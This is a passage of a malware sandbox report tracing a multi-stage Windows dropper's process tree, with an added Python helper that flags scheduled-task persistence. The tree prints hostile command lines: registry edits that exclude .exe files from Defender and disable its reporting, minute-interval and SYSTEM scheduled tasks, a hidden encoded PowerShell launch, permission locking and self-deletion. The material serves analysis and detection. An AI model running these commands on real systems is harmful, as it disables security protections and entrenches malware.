- Token: 33 | 4848 | handdiy_1.exe
- Token: 34 | 4848 | handdiy_1.exe
- Token: 35 | 4848 | handdiy_1.exe
- Token: SeDebugPrivilege | 764 | taskkill.exe
- Token: SeDebugPrivilege | 5012 | powershell.EXE
- Token: SeDebugPrivilege | 1068 | powershell.exe
- Token: SeDebugPrivilege | 3128 | powershell.exe
- Token: SeDebugPrivilege | 4620 | powershell.EXE
Suspicious use of FindShellTrayWindow 52 IoCs
pid | Process (repeated entries grouped; 52 entries in total)
- 5072 | chrome.exe (26 entries)
- 2648 | chrome.exe (26 entries)
Suspicious use of SendNotifyMessage 48 IoCs
pid | Process (repeated entries grouped; 48 entries in total)
- 5072 | chrome.exe (24 entries)
- 2648 | chrome.exe (24 entries)
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (identical repeated rows grouped; 64 entries in total)
- PID 1352 wrote to memory of 536 | 1352 | file.exe | 76 (3 entries)
- PID 1352 wrote to memory of 620 | 1352 | file.exe | 77 (3 entries)
- PID 536 wrote to memory of 1500 | 536 | Player3.exe | 78 (3 entries)
- PID 1352 wrote to memory of 2892 | 1352 | file.exe | 79 (3 entries)
- PID 1500 wrote to memory of 5012 | 1500 | nbveek.exe | 82 (3 entries)
- PID 1500 wrote to memory of 4980 | 1500 | nbveek.exe | 84 (3 entries)
- PID 2892 wrote to memory of 3592 | 2892 | zhangfan.exe | 87 (3 entries)
- PID 4980 wrote to memory of 4216 | 4980 | cmd.exe | 89 (3 entries)
- PID 4980 wrote to memory of 1808 | 4980 | cmd.exe | 88 (3 entries)
- PID 4980 wrote to memory of 4936 | 4980 | cmd.exe | 90 (3 entries)
- PID 1500 wrote to memory of 396 | 1500 | nbveek.exe | 92 (2 entries)
- PID 4980 wrote to memory of 2424 | 4980 | cmd.exe | 93 (3 entries)
- PID 4980 wrote to memory of 3920 | 4980 | cmd.exe | 94 (3 entries)
- PID 4980 wrote to memory of 1792 | 4980 | cmd.exe | 95 (3 entries)
- PID 1500 wrote to memory of 4848 | 1500 | nbveek.exe | 97 (3 entries)
- PID 4712 wrote to memory of 4824 | 4712 | rundll32.exe | 99 (3 entries)
- PID 1500 wrote to memory of 976 | 1500 | nbveek.exe | 103 (3 entries)
- PID 4848 wrote to memory of 3372 | 4848 | handdiy_1.exe | 104 (3 entries)
- PID 3372 wrote to memory of 764 | 3372 | cmd.exe | 107 (3 entries)
- PID 976 wrote to memory of 3192 | 976 | random.exe | 108 (3 entries)
- PID 732 wrote to memory of 1228 | 732 | rundll32.exe | 111 (3 entries)
- PID 1500 wrote to memory of 1224 | 1500 | nbveek.exe | 116 (2 entries)
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F4⤵
- Creates scheduled task(s)
PID:5012
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"5⤵PID:1808
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4216
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E5⤵PID:4936
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:2424
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"5⤵PID:3920
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E5⤵PID:1792
C:\Users\Admin\AppData\Local\Temp\1000040001\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\1000040001\pb1111.exe"4⤵
- Executes dropped EXE
PID:396
C:\Users\Admin\AppData\Local\Temp\1000042001\handdiy_1.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\handdiy_1.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc47fa4f50,0x7ffc47fa4f60,0x7ffc47fa4f706⤵PID:2628
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1684 /prefetch:26⤵PID:2588
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1956 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4404
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:86⤵PID:652
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:16⤵PID:3036
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:16⤵PID:4584
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2092 /prefetch:16⤵PID:4164
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:16⤵PID:3344
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:86⤵PID:3996
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5028 /prefetch:86⤵PID:1484
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5256 /prefetch:86⤵PID:3532
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:86⤵PID:4752
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:86⤵PID:1280
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5972 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:3600
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:86⤵PID:3728
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:620
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:86⤵PID:3732
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:86⤵PID:3996
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:86⤵PID:3536
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:16⤵PID:4316
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4076
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:86⤵PID:1208
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:3744
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2528 /prefetch:86⤵PID:4512
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:86⤵PID:384
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,2098009809291006851,15223257788741406556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4764
C:\Users\Admin\AppData\Local\Temp\1000043001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\random.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\AppData\Local\Temp\1000043001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\random.exe" -h5⤵
- Executes dropped EXE
PID:3192
C:\Users\Admin\AppData\Local\Temp\1000045001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000045001\setup.exe"4⤵
- Executes dropped EXE
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\7zS271.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
PID:5040 -
C:\Users\Admin\AppData\Local\Temp\7zS714.tmp\Install.exe.\Install.exe /S /site_id "385107"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:3412 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:4712
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:4064
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:3924
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:4488
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:4560
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:1836
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:1088
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:1620
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpYZgDThj" /SC once /ST 07:50:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:3728
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpYZgDThj"7⤵PID:1020
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpYZgDThj"7⤵PID:4848
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnNSajhVxJSdGghoLZ" /SC once /ST 21:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\UxpymuaMygfozov\NbuyrFd.exe\" kl /site_id 385107 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2452
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main4⤵
- Loads dropped DLL
PID:4572 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
PID:4424 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4424 -s 6806⤵
- Program crash
PID:3732
C:\Users\Admin\AppData\Local\Temp\birge.exe"C:\Users\Admin\AppData\Local\Temp\birge.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:620 -
C:\Users\Admin\AppData\Roaming\W8xBG2CB.exe"C:\Users\Admin\AppData\Roaming\W8xBG2CB.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
PID:1088 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "2.5.5.Microsoft.NET\AgentActivationRuntime2.5.5.\IntelPalnt2.5.5." /TR "C:\ProgramData\Mslprojector\WlndowsDraiver-Ver2.5.5.8.exe" /SC MINUTE4⤵
- Creates scheduled task(s)
PID:772
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\Mslprojector" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:620
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\Mslprojector" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:828
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\Mslprojector" /inheritance:e /deny "admin:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:2012
C:\Users\Admin\AppData\Roaming\nEzF0Hw6.exe"C:\Users\Admin\AppData\Roaming\nEzF0Hw6.exe"3⤵
- Executes dropped EXE
PID:4620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\nEzF0Hw6.exe4⤵PID:1996
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵PID:1296
C:\Users\Admin\AppData\Local\Temp\zhangfan.exe"C:\Users\Admin\AppData\Local\Temp\zhangfan.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\zhangfan.exe"C:\Users\Admin\AppData\Local\Temp\zhangfan.exe" -h3⤵
- Executes dropped EXE
PID:3592
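Four schtasks calls in the file.exe tree above carry its persistence: nbveek.exe registers itself with /SC MINUTE /MO 1 /F (re-run every minute, overwriting any existing task of that name), Install.exe creates the "gpYZgDThj" task whose only job is to launch encoded PowerShell, runs it at once and deletes it, then registers "bnNSajhVxJSdGghoLZ" with /RU SYSTEM pointing at NbuyrFd.exe in the user's Temp directory, and W8xBG2CB.exe registers WlndowsDraiver-Ver2.5.5.8.exe under ProgramData with /SC MINUTE and no modifier. The Python triage helper below is an added example, not part of the Triage report and not code from the sample: it parses those exact command lines, groups them by task name, and flags the traits an analyst would pull out by hand. The user-writable directory list and the flag wording are this example's own assumptions.

```python
import re

# schtasks calls copied from the process tree above, in execution order: the
# Amadey "nbveek.exe" every-minute task, the create/run/delete one-shot
# "gpYZgDThj", the SYSTEM task pointing at NbuyrFd.exe, and the every-minute
# task from the W8xBG2CB.exe branch. The last line is a non-schtasks command
# from the same tree, included so the parser is seen ignoring it.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F',
    'schtasks /CREATE /TN "gpYZgDThj" /SC once /ST 07:50:12 /F /RU "Admin" /TR '
    '"powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    'schtasks /run /I /tn "gpYZgDThj"',
    'schtasks /DELETE /F /TN "gpYZgDThj"',
    r'schtasks /CREATE /TN "bnNSajhVxJSdGghoLZ" /SC once /ST 21:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\UxpymuaMygfozov\NbuyrFd.exe\" kl /site_id 385107 /S" /V1 /F',
    r'"C:\Windows\System32\schtasks.exe" /CREATE /TN "2.5.5.Microsoft.NET\AgentActivationRuntime2.5.5.\IntelPalnt2.5.5." /TR "C:\ProgramData\Mslprojector\WlndowsDraiver-Ver2.5.5.8.exe" /SC MINUTE',
    "cmd.exe /c taskkill /f /im chrome.exe",
]

# Whitespace split that keeps "quoted strings" (including \" escapes) as one token.
_TOKEN_RE = re.compile(r'"(?:\\"|[^"])*"|\S+')


def tokenize(cmdline):
    return [t.strip('"') for t in _TOKEN_RE.findall(cmdline)]


_VERBS = {"/create", "/run", "/delete", "/change", "/query", "/end"}
_VALUE_SWITCHES = {"/tn", "/tr", "/sc", "/mo", "/st", "/sd", "/ru", "/rp"}


def parse_schtasks(cmdline):
    """Return (verb, {switch: value}) for a schtasks call, or None for anything else."""
    toks = tokenize(cmdline)
    if not toks or toks[0].lower().rsplit("\\", 1)[-1] not in ("schtasks", "schtasks.exe"):
        return None
    verb, opts, i = None, {}, 1
    while i < len(toks):
        t = toks[i].lower()
        if t in _VERBS:
            verb = t[1:]
        elif t in _VALUE_SWITCHES and i + 1 < len(toks):
            opts[t[1:]] = toks[i + 1]
            i += 1
        # /F, /I, /V1 and other bare flags take no argument and are skipped
        i += 1
    return verb, opts


# Locations a standard user can write to. A task whose action lives here is
# persistence for something that never went through an installer. This list,
# like the flag wording below, is the example's own assumption.
_USER_WRITABLE = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\programdata\\",
    "\\users\\public\\",
    "\\windows\\temp\\",
)
# -EncodedCommand and its short forms -ec / -e, followed by a base64 blob.
_ENCODED_PS = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}")


def create_flags(opts):
    """Reasons a /CREATE deserves a look; the order is fixed so results compare cleanly."""
    action = opts.get("tr", "").lower()
    flags = []
    if any(p in action for p in _USER_WRITABLE):
        flags.append("action in user-writable path")
    # /SC MINUTE without /MO means every minute: the modifier defaults to 1.
    if opts.get("sc", "").lower() == "minute" and opts.get("mo", "1") == "1":
        flags.append("runs every minute")
    if opts.get("ru", "").lower() == "system":
        flags.append("runs as SYSTEM")
    if _ENCODED_PS.search(action):
        flags.append("encoded powershell in action")
    return flags


def assess(command_lines):
    """Group schtasks calls by task name; input order is the execution order."""
    tasks = {}
    for line in command_lines:
        parsed = parse_schtasks(line)
        if parsed is None:
            continue
        verb, opts = parsed
        entry = tasks.setdefault(opts.get("tn", ""), {"action": "", "flags": [], "sequence": []})
        entry["sequence"].append(verb)
        if verb == "create":
            entry["action"] = opts.get("tr", "")
            entry["flags"] = create_flags(opts)
    for entry in tasks.values():
        # Created, run immediately, deleted: the scheduler is a launcher here, and
        # a later "schtasks /Query" will not show the task at all.
        if entry["sequence"] == ["create", "run", "delete"]:
            entry["flags"].append("create-run-delete one-shot")
    return tasks


if __name__ == "__main__":
    for name, info in assess(SAMPLE_COMMAND_LINES).items():
        print(f"{name}: {info['sequence']} -> {info['flags']}")
```

On a live host the same parser is fed the command lines from Sysmon event ID 1 or Security event 4688 rather than a sandbox report; that matters for the one-shot case, since the gpYZgDThj task is gone by the time anyone lists tasks and only the process-creation record shows it ever existed. The /RU SYSTEM flag records what the command asked for, not what the scheduler granted.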
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
PID:4824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 6003⤵
- Program crash
PID:824
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4824 -ip 48241⤵PID:2368
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
PID:1228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 6003⤵
- Program crash
PID:1728
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1228 -ip 12281⤵PID:1788
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1352
